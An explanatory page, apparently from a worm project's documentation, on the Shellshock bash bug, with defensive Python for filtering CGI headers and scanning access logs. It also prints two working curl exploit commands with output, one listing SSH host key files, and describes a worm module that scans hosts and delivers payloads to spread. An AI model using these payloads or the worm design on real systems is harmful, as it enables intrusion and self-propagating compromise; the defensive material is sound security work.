Illustration of "Worm: Shellshock exploit"

Description and background

Shellshock is a security bug discovered in September 2014 in bash, exploitable in combination with other programs such as Apache HTTPD[@20141].

When a client sends a request to the server, it can specify headers, which are a list of keys associated with values. HTTPD is a server that receives TCP connections and handles the clients' connections and requests. It can also forward those requests to other programs (a shell, PHP, or any other software), also called "modules", to handle the logical part of the process.

The problem that appeared with HTTPD and bash was caused by the way HTTPD used to forward the HTTP headers to the process of that module: each header was passed as an environment variable (the key was the name of the variable, and the value was associated with it).

But bash parses environment variables that look like function definitions, and vulnerable versions also executed whatever commands followed the function body. As the client must be treated as untrusted, the content of the headers should have been sanitized before being written to bash. The bug has been widely patched today, and if a server is still vulnerable to this attack, it most likely already belongs to a botnet.
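As an added example (not code from the original page or from the worm project it describes), the following Python sketch mirrors the CGI convention that turns request headers into HTTP_* environment variables and shows the check a gateway could apply before exporting them to a child process. The header names and values are constructed for the example, apart from the payload quoted further down on this page; the permanent fix was patching bash itself, so this filter is defence in depth rather than a substitute for it.

```python
import re
from typing import Dict, List, Tuple

# Bash treated an exported value beginning with "() {" as a function
# definition; the Shellshock bug was that commands after the closing brace
# were executed as well.  This pattern is deliberately looser than bash's
# own parser so that spacing variants are also caught.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")


def header_to_env_name(name: str) -> str:
    """Map a request header to its CGI environment variable name (RFC 3875):
    Content-Type and Content-Length are special-cased, everything else gets
    the HTTP_ prefix, with '-' replaced by '_' and upper-cased."""
    lname = name.strip().lower()
    base = lname.upper().replace("-", "_")
    if lname in ("content-type", "content-length"):
        return base
    return "HTTP_" + base


def is_shellshock_payload(value: str) -> bool:
    """True if the header value looks like an exported function definition."""
    return SHELLSHOCK_RE.match(value) is not None


def build_cgi_env(headers: Dict[str, str]) -> Tuple[Dict[str, str], List[str]]:
    """Return (env, rejected): env holds the variables that are safe to hand
    to a CGI child, rejected lists the header names that were dropped."""
    env: Dict[str, str] = {}
    rejected: List[str] = []
    for name, value in headers.items():
        if is_shellshock_payload(value):
            rejected.append(name)
            continue
        env[header_to_env_name(name)] = value
    return env, rejected


# Constructed sample request: two ordinary headers plus the header used in
# this page's second curl command.
SAMPLE_HEADERS = {
    "Host": "192.168.0.125",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
    "Attack": "() { :; }; echo; /usr/bin/env ls /etc/ssh -l",
}

if __name__ == "__main__":
    env, rejected = build_cgi_env(SAMPLE_HEADERS)
    for key in sorted(env):
        print(f"export {key}={env[key]!r}")
    print("rejected headers:", rejected)
```

The rejection happens before the variable is exported, which is the point the page makes: by the time bash sees the value it is too late, since a vulnerable bash evaluates it while importing its environment.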

curl http://192.168.0.125/cgi-bin/test-cgi -H "User-Agent: () { :; }; echo \"ShellShockHeader: Vulnerable\"" -I

HTTP/1.1 200 OK
Date: Thu, 08 Jun 2017 17:06:02 GMT
Server: Apache/2.4.1 (Unix)
ShellShockHeader: Vulnerable
Content-Type: text/plain; charset=iso-8859-1

With this bug it is possible to execute arbitrary shell code, possibly with root permissions: list critical files, overwrite them, restart services, etc.

curl http://192.168.0.125/cgi-bin/test-cgi -H "Attack: () { :; }; echo; /usr/bin/env ls /etc/ssh -l"

total 280
-rw-r--r-- 1 root root 242091 Jul 22 2016 moduli
-rw-r--r-- 1 root root 1690 Jul 22 2016 ssh_config
-rw------- 1 root root 672 Apr 29 10:56 ssh_host_dsa_key
-rw-r--r-- 1 root root 601 Apr 29 10:56 ssh_host_dsa_key.pub
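Requests like the two above leave a trace in the web server's access log. As an added example (not from the original page or the worm project), here is a small scanner for Apache combined-format log lines that flags the same function-definition signature in the request line, Referer and User-Agent fields. The log lines and client addresses below are constructed for the example. A custom header such as the Attack header used above only reaches the access log if the LogFormat records it (Apache's %{Attack}i directive), so for arbitrary header names the inspection has to happen on the live request, for instance in a web application firewall module.

```python
import re
from typing import Dict, List, Optional

# Function-definition signature, searched anywhere in a logged field.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" format; quoted fields may contain \" escapes, which
# Apache emits for embedded double quotes.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<user_agent>' + _QUOTED + r')"$'
)


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if malformed."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_hits(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per (line, field) in which the signature appears."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue
        parts = entry["request"].split(" ")
        path = parts[1] if len(parts) >= 2 else entry["request"]
        for field in ("request", "referer", "user_agent"):
            if SHELLSHOCK_RE.search(entry[field]):
                hits.append({"ip": entry["ip"], "time": entry["ts"],
                             "path": path, "field": field,
                             "value": entry[field]})
    return hits


# Constructed sample log: the first line is what the page's first curl
# command would leave behind; the other two are ordinary traffic.
SAMPLE_LOG = r"""
192.168.0.50 - - [08/Jun/2017:17:06:02 +0000] "HEAD /cgi-bin/test-cgi HTTP/1.1" 200 - "-" "() { :; }; echo \"ShellShockHeader: Vulnerable\""
192.168.0.50 - - [08/Jun/2017:17:07:10 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 200 412 "-" "curl/7.52.1"
10.0.0.3 - - [08/Jun/2017:17:08:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
""".strip().splitlines()


def scan_sample() -> List[Dict[str, str]]:
    """Run the scanner over the constructed sample log."""
    return find_shellshock_hits(SAMPLE_LOG)


if __name__ == "__main__":
    for hit in scan_sample():
        print(f"{hit['time']} {hit['ip']} {hit['path']} [{hit['field']}] {hit['value']}")
```

Only the first constructed line is reported: the second request carried its payload in a header the combined format does not record, which is exactly why header-level inspection matters for CGI paths.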

The Shellshock features for a worm

The Shellshock module uses this bug to make the target execute arbitrary shell code. It is possible to specify any domain name or IP address to be scanned. If a host tests positive for this bug, an arbitrary payload can be delivered to that server, allowing the worm to propagate onto it, for example.